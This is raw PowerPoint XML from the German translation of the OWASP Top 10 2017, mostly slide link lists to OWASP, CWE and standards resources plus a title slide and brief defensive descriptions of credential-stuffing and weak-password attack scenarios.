<file path=ppt/slides/_rels/slide2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1.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ags" Target="../tags/tag20.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21.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide26.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology"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cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/451.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/400.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/829.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/799.html"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s://github.com/OWASP/Top10/tree/master/2017/datacall" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide24.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1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24.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissions"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www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/Hamburg" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/Ruhrpott" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/Frankfurt" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/M%C3%BCnchen" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/Dresden" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/K%C3%B6ln" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/Karlsruhe" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Germany/Projekte/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/Heilbronn-Franken" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_German_Chapter_Stammtisch_Initiative/Stuttgart" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4.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26.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.autodesk.com/" TargetMode="External"/><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slide" Target="slide20.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project"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owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Translation_Efforts_2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide26.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6.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notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xm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slide" Target="slide16.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)"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www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/index.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External"/><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slide" Target="slide23.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html"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microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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 TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Preven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2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.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s://www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinje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6858000" cy="46080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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="OWASP_logo.png"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381600"/>
            <a:ext cx="3261600" cy="997200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cc.logo.large.png">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5108822" y="9243000"/>
            <a:ext cx="1080000" cy="259200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304799" y="1828800"/>
            <a:ext cx="6238875" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Die 10 kritischsten Sicherheitsrisiken </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>für Webanwendungen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="de-DE" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(Deutsche Version 1.0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935032" y="9356656"/>
            <a:ext cx="4389568" cy="430887"/>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Dieses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"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Dokument ist wie folgt lizenziert</a:t>
            </a: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b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Creative Commons Attribution-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="110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ShareAlike</a:t>
            </a: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 4.0 International License</a:t>
            </a:r>
            <a:endPar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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Grafik 2"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990601" y="5302600"/>
            <a:ext cx="4876397" cy="3250800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="9488895"/>
            <a:ext cx="1630232" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11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https://owasp.de</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="C:\Users\tglemser\Documents\Projekte intern\OWASP\Grafik Allgemein\OWASP WHIT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1566" y="8402264"/>
            <a:ext cx="1002209" cy="1101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774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Mögliche Angriffsszenarien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Credential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder die Verwendung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>von Passwortlisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sind übliche Angriffe. Sofern eine Anwendung keine automatisierte Erkennung von „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Credential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“ implementiert, können gültige Benutzerdaten durchprobiert und auf Gültigkeit geprüft werden.</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r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die meisten Angriffe sind erfolgreich, weil weiterhin auf passwortbasierte Verfahren als einzigen Faktor gesetzt wird. Ehemals als Best-Practice anerkannte Verfahren wie Passwortwechsel und Komplexitätsanforderungen führen nur dazu, dass Benutzer Passwörter wiederverwenden und schwache Passwörter vergeben. Organisationen sind aufgefordert, diese Vorgehensweise entsprechend NIST 800-53 zu verhindern und Mehrfaktor-Authentisierung zu benutzen.</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r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
